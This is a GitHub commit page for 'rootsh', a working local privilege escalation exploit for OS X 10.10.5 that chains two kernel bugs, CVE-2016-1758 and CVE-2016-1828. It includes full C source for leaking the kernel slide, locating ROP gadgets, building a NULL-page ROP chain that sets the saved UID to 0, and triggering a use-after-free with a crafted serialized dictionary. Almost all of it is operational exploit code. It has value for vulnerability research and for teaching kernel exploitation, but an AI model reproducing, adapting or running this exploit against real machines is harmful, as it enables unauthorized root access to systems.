Skip to content

Commit

Permalink
rootsh
Browse files Browse the repository at this point in the history
rootsh is a local privilege escalation for OS X 10.10.5 (build 14F27)
that exploits CVE-2016-1828 and CVE-2016-1758.
  • Loading branch information
bazad committed May 18, 2016
0 parents commit ba4a86b
Show file tree
Hide file tree
Showing 9 changed files with 429 additions and 0 deletions.
25 changes: 25 additions & 0 deletions Makefile
@@ -0,0 +1,25 @@
TARGET = rootsh

all: $(TARGET)

CFLAGS = -Wall -Wpedantic -Werror
FRAMEWORKS = -framework IOKit

# Note that in addition to the standard flags we also need
#
# -m32 -Wl,-pagezero_size,0
#
# We need these flags because we are leveraging the use-after-free to generate
# a kernel NULL-pointer dereference. By mapping the NULL page in user space we
# ensure that when the kernel dereferences the NULL pointer it gets a value
# that we control. OS X does not allow 64-bit processes to map the NULL page;
# however, for legacy support, 32-bit processes can map the NULL page. In order
# to do so we generate a Mach-O executable without an initial __PAGEZERO
# segment protecting NULL. The "-m32" flag compiles the executable as 32-bit,
# while the "-Wl,-pagezero_size,0" flag causes the linker to not insert a
# __PAGEZERO segment in the final Mach-O executable.
$(TARGET): main.c kernel_image.c kernel_rop.c kernel_slide.c
clang $(CFLAGS) $(FRAMEWORKS) -m32 -Wl,-pagezero_size,0 -O3 $^ -o $@

clean:
rm -f -- $(TARGET)
28 changes: 28 additions & 0 deletions README.md
@@ -0,0 +1,28 @@
## rootsh

rootsh is a local privilege escalation targeting OS X Yosemite 10.10.5 build
14F27. It exploits [CVE-2016-1758] and [CVE-2016-1828], two vulnerabilities in
XNU that were patched in OS X El Capitan [10.11.4] and [10.11.5]. rootsh will
not work on platforms with SMAP enabled.

[CVE-2016-1758]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1758
[CVE-2016-1828]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1828
[10.11.4]: https://support.apple.com/en-us/HT206167
[10.11.5]: https://support.apple.com/en-us/HT206567

### CVE-2016-1758

CVE-2016-1758 is an information leak caused by copying out uninitialized bytes
of kernel stack to user space. By comparing leaked kernel pointers with fixed
reference addresses it is possible to recover the kernel slide.

### CVE-2016-1828

CVE-2016-1828 is a use-after-free during object deserialization. By passing a
crafted binary-serialized dictionary into the kernel, it is possible to trigger
a virtual method invocation on an object with a controlled vtable pointer.

### License

The rootsh code is released into the public domain. As a courtesy I ask that if
you use any of this code in another project you attribute it to me.
113 changes: 113 additions & 0 deletions kernel_image.c
@@ -0,0 +1,113 @@
/* kernel_image.c
* Brandon Azad
*
* Kernel parsing routines to find addresses of symbols and byte sequences.
*/

#include "kernel_image.h"

#include <fcntl.h>
#include <mach/mach.h>
#include <mach-o/nlist.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#include "kernel_slide.h"

static struct mach_header_64 * kernel;
static size_t kernel_size;
static uint64_t kernel_base;
static struct symtab_command * kernel_symtab;

/* Load the kernel binary into the current process's memory and parse it to
find the symbol table. */
int
load_kernel() {
int fd = open("/System/Library/Kernels/kernel", O_RDONLY);
if (fd == -1) {
return 1;
}
struct stat st;
int err = fstat(fd, &st);
if (err) {
close(fd);
return 2;
}
kernel_size = st.st_size;
kernel = mmap(NULL, kernel_size, PROT_READ, MAP_SHARED, fd, 0);
close(fd);
if (kernel == MAP_FAILED) {
return 3;
}
struct load_command * lc = (struct load_command *)((uintptr_t)kernel + sizeof(*kernel));
while ((uintptr_t)lc < (uintptr_t)kernel + (uintptr_t)kernel->sizeofcmds) {
if (lc->cmd == LC_SYMTAB) {
kernel_symtab = (struct symtab_command *)lc;
} else if (lc->cmd == LC_SEGMENT_64) {
struct segment_command_64 * sc = (struct segment_command_64 *)lc;
if (strcmp(sc->segname, SEG_TEXT) == 0) {
kernel_base = sc->vmaddr;
}
}
lc = (struct load_command *)((uintptr_t)lc + lc->cmdsize);
}
if (kernel_symtab == NULL) {
return 4;
}
if (kernel_base == 0) {
return 5;
}
return 0;
}

/* Find the address of the given kernel symbol in kernel memory. The returned
address factors in the kernel slide, so it can be used directly in building
a ROP payload. */
int
find_kernel_symbol(const char * name, uint64_t * addr) {
const char * base = (const char *)((uintptr_t)kernel + kernel_symtab->stroff);
const char * str = (const char *)((uintptr_t)base + 4);
const char * end = (const char *)((uintptr_t)base + kernel_symtab->strsize);
uint64_t strx;
for (;; ++str) {
strx = (uintptr_t)str - (uintptr_t)base;
const char * p = name;
while (str < end && *p == *str && *p) {
++p; ++str;
}
if (str < end && *p == *str) {
break;
}
while (str < end && *str) {
++str;
}
if (str == end) {
return 1;
}
}
struct nlist_64 * nl = (struct nlist_64 *) ((uintptr_t)kernel + kernel_symtab->symoff);
for (uint32_t i = 0; i < kernel_symtab->nsyms; ++i) {
if (nl[i].n_un.n_strx == strx) {
if ((nl[i].n_type & N_TYPE) != N_SECT) {
return 2;
}
*addr = nl[i].n_value + kernel_slide;
return 0;
}
}
return 3;
}

/* Find the address of the given byte sequence in kernel memory. The returned
address factors in the kernel slide, so it can be used directly in building
a ROP payload. */
int
find_kernel_bytes(const void * value, size_t size, uint64_t * addr) {
const void * found = memmem(kernel, kernel_size, value, size);
if (found == NULL) {
return 1;
}
*addr = (uint64_t)found - (uint64_t)kernel + kernel_base + kernel_slide;
return 0;
}
12 changes: 12 additions & 0 deletions kernel_image.h
@@ -0,0 +1,12 @@
/* kernel_image.h
* Brandon Azad
*
* Kernel parsing routines to find addresses of symbols and byte sequences.
*/

#include <mach-o/loader.h>
#include <stdlib.h>

int load_kernel();
int find_kernel_symbol(const char * name, uint64_t * addr);
int find_kernel_bytes(const void * value, size_t size, uint64_t * addr);
129 changes: 129 additions & 0 deletions kernel_rop.c
@@ -0,0 +1,129 @@
/* kernel_rop.c
* Brandon Azad
*
* Kernel instruction pointer control to execute the ROP payload.
*
* CVE-2016-1828:
* This vulnerability is a use-after-free in OSUnserializeBinary that can be
* triggered via the io_service_get_matching_services_bin Mach trap from
* user space.
*/

#include "kernel_rop.h"

#include <IOKit/IOKitLib.h>
#include <IOKit/iokitmig.h>
#include <mach/mach.h>
#include <stdio.h>

#include "kernel_image.h"

static const uint8_t xchg_esp_eax_pop_rsp_ins[] = {
0x94, /* xchg esp, eax */
0x5c, /* pop rsp */
0xc3, /* ret */
};
static const uint8_t xchg_rax_rdi_ins[] = {
0x48, 0x97, /* xchg rax, rdi */
0xc3, /* ret */
};
static const uint8_t set_svuid_0_ins[] = {
0xc7, 0x47, 0x08, 0x00, 0x00, 0x00, 0x00, /* mov dword ptr [rdi+8], 0 */
0xc3, /* ret */
};

/* Build the ROP payload that will be used to control code execution in the
kernel. The payload is stored on the NULL page, so the kernel will panic if
SMAP is enabled. The entry point is the instruction pointer stored in
virtual method 4, which will pivot to the ROP stack. The ROP stack is placed
at the end of the NULL page so that there's room for the stack frames of the
functions we call.
The payload itself sets the saved user ID to 0. Once we return from the
kernel we can elevate privileges by calling seteuid(0). */
int
build_rop_payload() {
uint64_t xchg_esp_eax_pop_rsp, xchg_rax_rdi, set_svuid_0;
uint64_t current_proc, proc_ucred, posix_cred_get, thread_exception_return;
int err = 0;
err |= find_kernel_bytes(xchg_esp_eax_pop_rsp_ins, sizeof(xchg_esp_eax_pop_rsp_ins), &xchg_esp_eax_pop_rsp);
err |= find_kernel_bytes(xchg_rax_rdi_ins, sizeof(xchg_rax_rdi_ins), &xchg_rax_rdi);
err |= find_kernel_bytes(set_svuid_0_ins, sizeof(set_svuid_0_ins), &set_svuid_0);
if (err) {
printf("error: could not locate ROP gadgets\n");
return 1;
}
err |= find_kernel_symbol("_current_proc", &current_proc);
err |= find_kernel_symbol("_proc_ucred", &proc_ucred);
err |= find_kernel_symbol("_posix_cred_get", &posix_cred_get);
err |= find_kernel_symbol("_thread_exception_return", &thread_exception_return);
if (err) {
printf("error: could not locate symbols for ROP payload\n");
return 2;
}
vm_address_t payload_addr = 0;
size_t size = 0x1000;
/* In case we are re-executing, deallocate the NULL page. */
vm_deallocate(mach_task_self(), payload_addr, size);
kern_return_t kr = vm_allocate(mach_task_self(), &payload_addr, size, 0);
if (kr != KERN_SUCCESS) {
printf("error: could not allocate NULL page for payload\n");
return 3;
}
uint64_t * vtable = (uint64_t *)payload_addr;
uint64_t * rop_stack = ((uint64_t *)(payload_addr + size)) - 8;
/* Virtual method 4 is called in the kernel with rax set to 0. */
vtable[0] = (uint64_t)rop_stack; /* *0 = rop_stack */
vtable[4] = xchg_esp_eax_pop_rsp; /* rsp = 0; rsp = *rsp; start rop */
rop_stack[0] = current_proc; /* rax = &proc */
rop_stack[1] = xchg_rax_rdi; /* rdi = &proc */
rop_stack[2] = proc_ucred; /* rax = &cred */
rop_stack[3] = xchg_rax_rdi; /* rdi = &cred */
rop_stack[4] = posix_cred_get; /* rax = &posix_cred */
rop_stack[5] = xchg_rax_rdi; /* rdi = &posix_cred */
rop_stack[6] = set_svuid_0; /* we are now setuid 0 */
rop_stack[7] = thread_exception_return; /* stop rop */
return 0;
}

/* Trigger the use-after-free to start executing the ROP payload. If the ROP
payload succeeds the UID and GID of the process will be set to 0. */
int
execute_rop_payload() {
uint32_t data[] = {
0x000000d3, /* magic */
0x81000010, /* 0: OSDictionary */
0x08000002, 0x00000061, /* 1: key "a" */
0x04000020, 0x00000000, 0x00000000, /* 2: 1[2: OSNumber] */
0x08000002, 0x00000062, /* 3: key "b" */
0x04000020, 0x00000000, 0x00000000, /* 4: 2[4: OSNumber] */
0x0c000001, /* 5: key "a" */
0x0b000001, /* 6: true ; heap freelist: 1[2:] */
0x0c000003, /* 7: key "b" */
0x0b000001, /* 8: true ; heap freelist: 2[4:] 1[2:] */
0x0c000001, /* 9: key "a" */
0x0a000028, /* 10: 2[10,4: OSData] => 1[2: contents] */
0x00000000, 0x00000000, /* vtable ptr */
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x0c000001, /* 11: key "b" */
0x8c000002, /* 12: 1[2: contents]->retain() */
};
mach_port_t master_port, iterator;
kern_return_t kr = IOMasterPort(MACH_PORT_NULL, &master_port);
if (kr != KERN_SUCCESS) {
return 1;
}
kr = io_service_get_matching_services_bin(master_port, (char *)data, sizeof(data), &iterator);
seteuid(0);
setuid(0);
setgid(0);
if (kr == KERN_SUCCESS) {
IOObjectRelease(iterator);
}
if (getuid() == 0) {
return 0;
}
printf("error: could not execute ROP payload\n");
return 2;
}
8 changes: 8 additions & 0 deletions kernel_rop.h
@@ -0,0 +1,8 @@
/* kernel_rop.h
* Brandon Azad
*
* Kernel instruction pointer control to execute the ROP payload.
*/

int build_rop_payload();
int execute_rop_payload();
62 changes: 62 additions & 0 deletions kernel_slide.c
@@ -0,0 +1,62 @@
/* kernel_slide.c
* Brandon Azad
*
* Kernel information leak to recover the kernel slide.
*
* CVE-2016-1758:
* This is a kernel information leak in the function if_clone_list caused by
* copying out 8 uninitialized bytes of the kernel stack to user space.
*/

#include "kernel_slide.h"

#include <net/if.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>

uint64_t kernel_slide;

static int
is_kernel_pointer(uint64_t addr) {
return (0xffffff7f00000000 <= addr && addr < 0xffffff8100000000);
}

static int
is_kernel_slide(uint64_t slide) {
return ((slide & ~0x000000007fe00000) == 0);
}

/* Recover the kernel slide. The kernel slide is used to translate the
compile-time addresses in the kernel binary to runtime addresses in the live
kernel. */
int
find_kernel_slide() {
int sockfd = socket(AF_INET, SOCK_STREAM, 0); /* prime stack */
if (sockfd == -1) {
printf("error: socket failed\n");
return 1;
}
char buffer[IFNAMSIZ];
struct if_clonereq ifcr = {
.ifcr_count = 1,
.ifcr_buffer = buffer,
};
int err = ioctl(sockfd, SIOCIFGCLONERS, &ifcr);
if (err == -1) {
printf("error: ioctl failed\n");
return 2;
}
close(sockfd);
uint64_t value = *(uint64_t *)(buffer + 8);
if (!is_kernel_pointer(value)) {
printf("error: leaked 0x%016llx\n", value);
return 3;
}
kernel_slide = value - 0xffffff800033487f; /* 10.10.5 (14F27): __kernel__: _ledger_credit+95 */
if (is_kernel_slide(kernel_slide)) {
return 0;
}
printf("error: leaked 0x%016llx\n", value);
return 4;
}
11 changes: 11 additions & 0 deletions kernel_slide.h
@@ -0,0 +1,11 @@
/* kernel_slide.h
* Brandon Azad
*
* Kernel information leak to recover the kernel slide.
*/

#include <stdint.h>

extern uint64_t kernel_slide;

int find_kernel_slide();

0 comments on commit ba4a86b

Please sign in to comment.